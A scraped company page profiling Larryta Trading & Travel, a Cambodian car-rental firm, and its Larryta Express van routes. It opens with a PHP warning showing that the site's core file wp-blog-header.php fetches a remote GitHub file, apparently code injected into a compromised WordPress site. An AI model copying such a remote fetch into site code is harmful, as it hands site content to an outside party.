Warning: file_get_contents(https://raw.githubusercontent.com/SilenceIsGold88/SuperCar/main/DoNotEditThisFile.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/larrytacarrental/public_html/wp-blog-header.php on line 2
Corporate Profile « Larryta
LARRYTA TRADING & TRAVEL Co., Ltd. was established in year 2004 by founder Mr Sao Seng Hak with only 5 staffs. With cash limitation he started with 2 cars on his own and 3 cars from his good buddies. Desire and commitment with full responsibilities he made his way up progressively into a fleet of 50 cars in next 4 years. By end of year 2012 he managed more than 100 cars in few categories. His client based is happy because of his way of management and with highly train professional driver. He forms a standard of drivers by educating and training practically to maintain the drivers standard. With highly trained mental attitudes he believe can support local and international client with indeed very proficiently. Through the support from formal institutions, NGOs, international, and private companies he manage to provide what has been trained and applied to all his client thus making his clients satisfy with his services.
Larryta had never been enough with current achievement comparing to future development and challenges ahead especially seeing Cambodia’s economic growth rapidly and demand in competitive transportation market. Larryta next action plan is to bring more enchantment on the existing businesses, and looking for any particular services that attract more potential investors. As market is competitive, we shifting to focus on the new services that interconnected with the existing products that enable to generate more profits and formulate substantial. Finally, we decided to launch inter-province express services. We named our service as “Larryta Express”
With detail study and planning, we are fully optimistic about this project even though there are number of companies have already dealing with it presently. Though, we are aware that this project will be challenging for us, the existing competitors have been aggressive with pricing, and part of market operated by those companies. However, this will not fade us to take chance in market, since we have experienced in this area of business for more than ten years already. Based on our research, marketing strategies campaign, sales executions, partnership, and cross selling to our loyalty customers we decided to launch “Larryta Express”. The maiden trip is from Phnom Penh to Siem Reap in 2013. Thereafter adding a total of 20 vans fleet plying Phnom Penh – Siem Reap –Phnom Penh, Siem Reap – Poipet – Siem Reap and lately Poipet – Bangkok/Pattaya/Koh Chang. The schedule is very tight but we manage to improve day by day. The management oversees this as important and putting every effort to make sure the express by Larryta must provide the best service not to be number one but at least in top 5 among the same range of service provider. The founder himself involved 100% to make sure the mission and vision is achieved.
The future express business plan is to provide services coverage to all 24 provinces in Cambodia with the earliest to kick off from Phnom Penh – Sihanouk Ville, Phnom Penh – Sway Rieng/HCM, Vietnam and so on in stages.